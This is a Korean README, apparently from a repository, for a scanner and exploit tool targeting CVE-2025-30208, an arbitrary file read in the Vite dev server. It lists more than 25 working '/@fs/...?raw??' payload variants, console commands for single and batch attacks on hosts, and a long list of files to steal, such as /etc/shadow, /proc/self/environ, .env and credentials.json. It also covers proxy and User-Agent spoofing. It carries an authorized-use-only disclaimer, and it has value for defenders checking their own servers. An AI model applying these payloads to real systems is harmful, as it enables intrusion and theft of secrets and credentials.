
CVE‑2025‑30208은 Vite 개발 서버(널리 사용되는 프론트엔드 빌드 도구)에서 발생하는 중간 심각도의 임의 파일 읽기 취약점입니다.
CVE-2025-30208을 위한 엔터프라이즈급 기능을 갖춘 고급 취약점 스캐너
Vite 임의 파일 읽기 취약점 탐지를 위한 전문 침투 테스트 도구
이 도구는 Vite 개발 서버의 CVE-2025-30208 취약점을 탐지하고 악용하도록 설계된 종합적인 취약점 스캐너입니다. 이 취약점은 Vite의 파일 시스템 엔드포인트를 통해 임의 파일 읽기 접근을 허용하여 민감한 구성 파일, 소스 코드 및 시스템 정보를 노출할 수 있습니다.
이 도구는 유지보수성과 확장성을 높이기 위해 모듈식 아키텍처를 갖추고 있습니다:
CVE-2025-30208.py - 메인 스캐너 애플리케이션payloads.py - 고급 악용 페이로드(60개 이상 변형)sensitive_files.py - 포괄적인 민감 파일 데이터베이스(200개 이상 파일)html_template.py - 향상된 해커 스타일 HTML 보고 템플릿pip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]
CVE-2025-30208 > scan
# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0
# Generate beautiful HTML report
CVE-2025-30208 > pull
# Start web server to view report
CVE-2025-30208 > web
# Start web server on specific port
CVE-2025-30208 > web 8081
# Stop web server
CVE-2025-30208 > web off
| 명령어 | 설명 | 예시 |
|---|---|---|
set <option> <value> | 구성 옵션 설정 | set RHOST 192.168.1.100 |
show options | 현재 설정 표시 | show options |
edit | 대화형 옵션 편집기 | edit |
run / exploit | 취약점 테스트 실행 | run |
batch | 여러 대상 일괄 스캔 | batch |
scan | 민감 파일 발견 | scan |
pull | 결과를 HTML/JSON으로 내보내기 | pull |
web [on|off|port] | HTML 보고서용 웹 서버 | web 8080 |
save | 세션 구성 저장 | save |
load | 세션 구성 불러오기 | load |
test | 대상 연결 테스트 | test |
validate | 현재 구성 검증 | validate |
verbose | 상세(verbose) 모드 전환 | verbose |
proxy | 프록시 설정 구성 | proxy |
headers | 사용자 지정 HTTP 헤더 설정 | headers |
rate | 속도 제한 구성 | rate |
log | 로깅 정보 표시 | log |
help / ? | 도움말 표시 | help |
| 옵션 | 설명 | 기본값 | 검증 |
|---|---|---|---|
RHOST | 대상 호스트/IP 주소 | - | 호스트 이름/IP 검증 |
RPORT | 대상 포트 번호 | - | 포트 범위(1-65535) |
FILEPATH | 테스트할 파일 경로 | etc/passwd | 경로 검증 |
PROXY | HTTP/HTTPS 프록시 URL | - | URL 형식 검증 |
VERBOSE | 상세(verbose) 출력 활성화 | false | 부울(Boolean) 검증 |
RATE_LIMIT | 요청 간 지연(초) | 0.3 | 숫자 검증 |
THREADS | 일괄 스캔 스레드 수 | 5 | 정수 검증 |
TIMEOUT | 요청 시간 제한(초) | 5 | 정수 검증 |
CUSTOM_HEADERS | 사용자 지정 HTTP 헤더(JSON) | {} | JSON 형식 검증 |
이 스캐너는 payloads.py에 구성된 60개 이상의 다양한 페이로드 변형을 사용합니다:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
/app/{file_path}?raw??
/App/{file_path}?raw??
이 도구는 sensitive_files.py에 구성된 200개 이상의 민감 파일을 테스트합니다:
/etc/passwd - 사용자 계정 정보/etc/shadow - 암호화된 비밀번호 데이터/etc/services - 네트워크 서비스/etc/hosts - 호스트 이름 매핑/etc/fstab - 파일 시스템 테이블/etc/ssh/sshd_config - SSH 서버 구성/etc/crontab - 시스템 cron 작업/etc/sudoers - Sudo 구성/proc/version - 커널 버전/proc/cpuinfo - CPU 정보/proc/meminfo - 메모리 정보/proc/self/environ - 프로세스 환경/proc/self/cmdline - 프로세스 명령줄/proc/net/tcp - TCP 연결/proc/net/udp - UDP 연결.env - 환경 변수.env.local - 로컬 환경.env.production - 프로덕션 환경config.json - 애플리케이션 구성settings.json - 애플리케이션 설정application.properties - Spring 구성application.yml - YAML 구성database.yml - 데이터베이스 구성secrets.json - 비밀 관리package.json - Node.js 의존성package-lock.json - 잠긴 의존성yarn.lock - Yarn 잠금 파일vite.config.js - Vite 구성vite.config.ts - TypeScript Vite 구성tsconfig.json - TypeScript 구성webpack.config.js - Webpack 구성next.config.js - Next.js 구성nuxt.config.js - Nuxt.js 구성angular.json - Angular 구성vue.config.js - Vue.js 구성rollup.config.js - Rollup 구성eslint.config.js - ESLint 구성prettier.config.js - Prettier 구성jest.config.js - Jest 구성babel.config.js - Babel 구성tailwind.config.js - Tailwind CSS 구성.git/config - Git 구성.gitignore - Git 무시 규칙.gitattributes - Git 속성.gitmodules - Git 서브모듈.git/HEAD - 현재 브랜치.git/logs/HEAD - Git 로그.git/refs/heads/master - 마스터 브랜치.git/refs/heads/main - 메인 브랜치README.md - 프로젝트 문서CHANGELOG.md - 변경 로그LICENSE - 라이선스 정보CONTRIBUTING.md - 기여 지침AUTHORS - 작성자 정보TODO.md - 할 일 목록ROADMAP.md - 개발 로드맵Dockerfile - Docker 구성docker-compose.yml - Docker Composedocker-compose.override.yml - 재정의 구성.dockerignore - Docker 무시 규칙docker-compose.prod.yml - 프로덕션 구성docker-compose.dev.yml - 개발 구성nginx.conf - Nginx 구성apache2.conf - Apache 구성httpd.conf - HTTP 데몬 구성.htaccess - Apache 접근 제어web.config - IIS 구성robots.txt - 검색 엔진 지시문sitemap.xml - 사이트 구조manifest.json - 웹 앱 매니페스트sw.js - 서비스 워커firebase.json - Firebase 구성firebase.rules - Firebase 보안 규칙boot.ini - 부트 구성autoexec.bat - 자동 실행 스크립트system.ini - 시스템 구성win.ini - Windows 구성Users - 사용자 디렉터리Windows - 시스템 파일Program Files - 애플리케이션 디렉터리System - 시스템 파일Library - 라이브러리 파일Applications - 애플리케이션 파일private/etc/hosts - 호스트 파일private/etc/passwd - 사용자 계정database.db - SQLite 데이터베이스database.sqlite - SQLite 데이터베이스data.db - 데이터 데이터베이스dump.sql - 데이터베이스 덤프schema.sql - 데이터베이스 스키마migrations - 데이터베이스 마이그레이션logs - 로그 디렉터리error.log - 오류 로그access.log - 접근 로그app.log - 애플리케이션 로그debug.log - 디버그 로그combined.log - 통합 로그backup - 백업 디렉터리backup.sql - 데이터베이스 백업backup.zip - 압축 백업dump - 데이터 덤프export - 데이터 내보내기auth.json - 인증 구성credentials.json - 자격 증명 저장keys.json - 키 관리tokens.json - 토큰 저장jwt.json - JWT 구성oauth.json - OAuth 구성api.json - API 구성swagger.json - API 문서openapi.json - OpenAPI 사양graphql.json - GraphQL 구성schema.json - API 스키마cloudformation.yml - AWS CloudFormationserverless.yml - Serverless 구성terraform.tf - Terraform 구성kubernetes.yml - Kubernetes 구성k8s.yml - Kubernetes 구성analytics.json - 분석 구성monitoring.json - 모니터링 설정metrics.json - 메트릭 구성telemetry.json - 원격 측정 데이터이 도구는 이제 다음과 같은 아름다운 해커 스타일 HTML 보고서를 생성합니다:
| 파일 | 설명 | 형식 |
|---|---|---|
data_leak.html | 향상된 해커 스타일 HTML 취약점 보고서 | HTML |
data_leak.json | 구조화된 JSON 내보내기 | JSON |
sensitive_files_discovery.json | 발견된 민감 파일 | JSON |
session.json | 저장된 세션 구성 | JSON |
logs/cve_2025_30208_YYYYMMDD_HHMMSS.log | 상세 감사 로그 | 텍스트 |
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
CVE-2025-30208/
├── CVE-2025-30208.py # Main scanner application
├── payloads.py # Advanced exploitation payloads (60+)
├── sensitive_files.py # Sensitive file database (200+)
├── html_template.py # Enhanced HTML reporting template
├── README.md # This documentation
├── requirements.txt # Python dependencies
├── logs/ # Log files directory
├── data_leak.html # Generated HTML reports
├── data_leak.json # Generated JSON reports
└── session.json # Saved session configurations
이 도구를 개선하기 위한 기여를 환영합니다:
payloads.py의 새로운 페이로드 변형sensitive_files.py의 추가 민감 파일 패턴html_template.py의 향상된 HTML 템플릿이 프로젝트는 교육 및 승인된 보안 테스트 목적으로만 라이선스가 부여됩니다.
⚠️ 법적 고지: 이 도구는 승인된 보안 테스트 및 연구 목적으로만 사용됩니다. 사용자는 시스템을 테스트하기 전에 적절한 승인을 받았는지 확인할 책임이 있습니다. 저자는 이 도구의 오용에 대해 책임을 지지 않습니다.
⭐ 이 도구가 도움이 되었다면 별표를 눌러 주세요! ⭐
보안 커뮤니티를 위해 ❤️로 만들었습니다
exit / quit |
| 도구 종료 |
exit |